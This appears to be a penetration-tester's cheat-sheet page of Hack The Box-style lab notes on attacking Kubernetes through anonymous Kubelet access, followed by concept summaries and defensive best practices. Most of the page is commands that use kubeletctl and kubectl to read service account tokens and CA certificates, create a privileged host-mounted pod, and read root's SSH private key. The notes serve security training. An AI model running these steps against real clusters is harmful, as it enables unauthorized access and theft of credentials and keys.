kubernetes

Tool

https://github.com/cyberark/kubeletctl

Extracting tokens

kubeletctl -i --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx | tee -a k8.token

Extracting certificates

kubeletctl --server 10.129.10.11 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx | tee -a ca.crt

Load token

export token=`cat k8.token`

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.10.11:6443 auth can-i --list

Create new pod

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 apply -f privesc.yaml

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.129.96.98:6443 get pods

Extracting root's SSH key

kubeletctl --server 10.129.10.11 exec "cat /root/root/.ssh/id_rsa" -p privesc -c privesc

HTB Module

Access Kubelet API (pods list)

curl https://<node_ip>:10250/pods -k | jq

Kubeletctl (pods list)

kubeletctl -i --server <node_ip> pods

Kubeletctl (scan for RCE)

kubeletctl -i --server <node_ip> scan rce

Kubeletctl (execute command in pod)

kubeletctl -i --server <node_ip> exec "id" -p <pod_name> -c <container_name>

Kubeletctl (extract token)

kubeletctl -i --server <node_ip> exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p <pod_name> -c <container_name> | tee -a k8.token

Kubeletctl (extract certificate)

kubeletctl --server <node_ip> exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p <pod_name> -c <container_name> | tee -a ca.crt

Set token variable

export token=`cat k8.token`

Check Kubernetes access rights (kubectl)

kubectl --token=$token --certificate-authority=ca.crt --server=https://<api_server_ip>:6443 auth can-i --list

Apply pod YAML (kubectl)

kubectl --token=$token --certificate-authority=ca.crt --server=https://<api_server_ip>:6443 apply -f privesc.yaml

Get pods (kubectl)

kubectl --token=$token --certificate-authority=ca.crt --server=https://<api_server_ip>:6443 get pods

Kubeletctl (execute command in privileged pod)

kubeletctl --server <node_ip> exec "cat /root/root/.ssh/id_rsa" -p privesc -c privesc

Basic kubectl commands

Get pods

kubectl get pods -A

Get services

kubectl get svc -A

Get deployments

kubectl get deployments -A

Get namespaces

kubectl get ns

Get secrets

kubectl get secrets -A -o yaml

Get service accounts

kubectl get sa -A -o yaml

Get roles

kubectl get roles -A -o yaml

Get rolebindings

kubectl get rolebindings -A -o yaml

Key Concepts:

Kubernetes Architecture:
- Control Plane (Master Node): Manages the cluster.
- Worker Nodes (Minions): Run containerized applications.
- Pods: Smallest deployable units, containing one or more containers.
Kubernetes API:
- Central point of interaction.
- Uses RESTful requests.
- Authentication and Authorization (RBAC).
Kubelet API:
- Agent running on each node.
- Can be vulnerable to anonymous access.
- Allows interaction with pods and containers.
Security Domains:
- Cluster infrastructure security.
- Cluster configuration security.
- Application security.
- Data security.

Vulnerabilities and Exploitation Techniques:

Anonymous Access to Kubelet:
- Using curl or kubeletctl to access the Kubelet API.
- Retrieving pod information.
- Executing commands within containers.
Service Account Tokens and Certificates:
- Extracting tokens and certificates from within a compromised pod.
- Using kubectl with the extracted credentials.
- Checking access rights (kubectl auth can-i).
Privileged Pod Creation:
- Creating a pod with a host root mount.
- Accessing host system files.
- Using hostNetwork: true, for network access to the host.
RBAC Misconfigurations:
- Exploiting overly permissive RBAC roles.
Container Vulnerabilities:
- Exploiting known vulnerabilities in container images.

Exploitation Steps (as described):

Access Kubelet API:
- curl or kubeletctl to retrieve pod information.
Extract Service Account Credentials:
- kubeletctl exec to retrieve token and certificate.
Use kubectl with Extracted Credentials:
- kubectl auth can-i to check permissions.
Create Privileged Pod:
- Create a YAML file with a host root mount.
- kubectl apply to create the pod.
Access Host Files:
- kubeletctl exec to access host files.

Important Considerations and Enhancements:

Security Best Practices:
- Disable anonymous access to Kubelet.
- Implement strong RBAC policies.
- Use Network Policies.
- Regularly scan container images for vulnerabilities.
- Use pod security policies or pod security standards.
- Use secrets management.
Attack Vectors:
- Compromised container images.
- Misconfigured RBAC.
- Vulnerabilities in Kubernetes components.
Detection:
- Monitor Kubelet API access.
- Audit RBAC configurations.
- Use security scanning tools.
Namespaces: Reinforce the importance of namespaces in kubernetes security.
Real World Examples: Researching real world kubernetes escapes will help solidify understanding of the attack vectors.
Container Runtime Security: Ensure the underlying container runtime is secure.

Previouskernel-exploit Nextld-library-path

Last updated 1 day ago

hashtagTool

hashtagExtracting tokens

hashtagExtracting certificates

hashtagLoad token

hashtagCreate new pod

hashtagExtracting root's SSH key

hashtagAccess Kubelet API (pods list)

hashtagKubeletctl (pods list)

hashtagKubeletctl (scan for RCE)

hashtagKubeletctl (execute command in pod)

hashtagKubeletctl (extract token)

hashtagKubeletctl (extract certificate)

hashtagSet token variable

hashtagCheck Kubernetes access rights (kubectl)

hashtagApply pod YAML (kubectl)

hashtagGet pods (kubectl)

hashtagKubeletctl (execute command in privileged pod)

hashtagBasic kubectl commands

hashtagKey Concepts: